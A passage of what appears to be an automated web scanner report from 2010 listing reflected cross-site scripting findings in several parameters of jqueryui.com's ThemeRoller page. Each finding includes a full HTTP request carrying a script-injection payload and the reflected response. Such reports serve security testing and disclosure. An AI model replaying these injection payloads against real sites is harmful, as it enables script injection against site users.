<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold36130"><script>alert(1)</script>7eb2177a8ce&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&b
...[SNIP]...

3.182. http://jqueryui.com/themeroller/ [iconColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9a1e"><script>alert(1)</script>1bc403df73c was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01e9a1e"><script>alert(1)</script>1bc403df73c&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01e9a1e"><script>alert(1)</script>1bc403df73c&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png
...[SNIP]...

3.183. http://jqueryui.com/themeroller/ [iconColorContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fad48"><script>alert(1)</script>c3cfabee311 was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70fad48"><script>alert(1)</script>c3cfabee311&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
rHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70fad48"><script>alert(1)</script>c3cfabee311&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&
...[SNIP]...

3.184. http://jqueryui.com/themeroller/ [iconColorDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5253d"><script>alert(1)</script>c643bd72dbb was submitted in the iconColorDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad5253d"><script>alert(1)</script>c643bd72dbb&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ontent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad5253d"><script>alert(1)</script>c643bd72dbb&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpaci
...[SNIP]...

3.185. http://jqueryui.com/themeroller/ [iconColorError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aadc9"><script>alert(1)</script>93993d12d9 was submitted in the iconColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0aaadc9"><script>alert(1)</script>93993d12d9&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:52 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120127

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
orderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0aaadc9"><script>alert(1)</script>93993d12d9&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&of
...[SNIP]...

3.186. http://jqueryui.com/themeroller/ [iconColorHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ce9"><script>alert(1)</script>9fcb678b763 was submitted in the iconColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b38ce9"><script>alert(1)</script>9fcb678b763&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:12 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b38ce9"><script>alert(1)</script>9fcb678b763&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard
...[SNIP]...

3.187. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67aae"><script>alert(1)</script>d3e33429518 was submitted in the iconColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff67aae"><script>alert(1)</script>d3e33429518&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ve=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff67aae"><script>alert(1)</script>d3e33429518&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

3.188. http://jqueryui.com/themeroller/ [iconColorHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164db"><script>alert(1)</script>6a00d66429c was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:33 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0164db"><script>alert(1)</script>6a00d66429c&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgI
...[SNIP]...

3.189. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c71b"><script>alert(1)</script>cc48d1bc9db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?2c71b"><script>alert(1)</script>cc48d1bc9db=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:08:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&2c71b"><script>alert(1)</script>cc48d1bc9db=1" type="text/css" media="all" />
...[SNIP]...

3.190. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f8ed"><script>alert(1)</script>e7a1c93907c was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6f8ed"><script>alert(1)</script>e7a1c93907c&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px6f8ed"><script>alert(1)</script>e7a1c93907c&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.191. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bb8"><script>alert(1)</script>18668a6627e was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px85bb8"><script>alert(1)</script>18668a6627e&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
